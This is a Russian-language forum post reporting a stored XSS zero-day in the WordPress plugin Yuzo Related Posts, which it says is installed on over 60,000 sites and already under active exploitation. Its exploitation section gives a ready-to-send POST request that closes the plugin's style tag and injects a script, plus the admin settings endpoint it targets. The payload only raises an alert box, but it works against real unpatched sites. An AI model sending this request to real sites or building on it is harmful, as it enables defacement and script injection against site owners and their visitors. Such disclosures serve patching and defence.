0day в wordpress плагине yuzo related posts

barboskin

Выдающийся
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА

barboskin

Выдающийся
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
3 Июл 2018
Сообщения
1,127
Реакции
1,041
Репутация
0
В плагине Yuzo Related Posts, установленном на более чем 60 000 сайтах, некий исследователь безопасности обнаружил уязвимость, которая позволяет хранить stored XSS. Несколько часов назад появились первые сообщения об экспуатации уязвимости.


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Эксплуатация:


достаточно послать POST запрос
Код:
yuzo_related_post_css_and_style=</style><script+language=javascript>alert('hacked');</script>
на


/wp-admin/options-general.php?page=yuzo-related-post
 
Сверху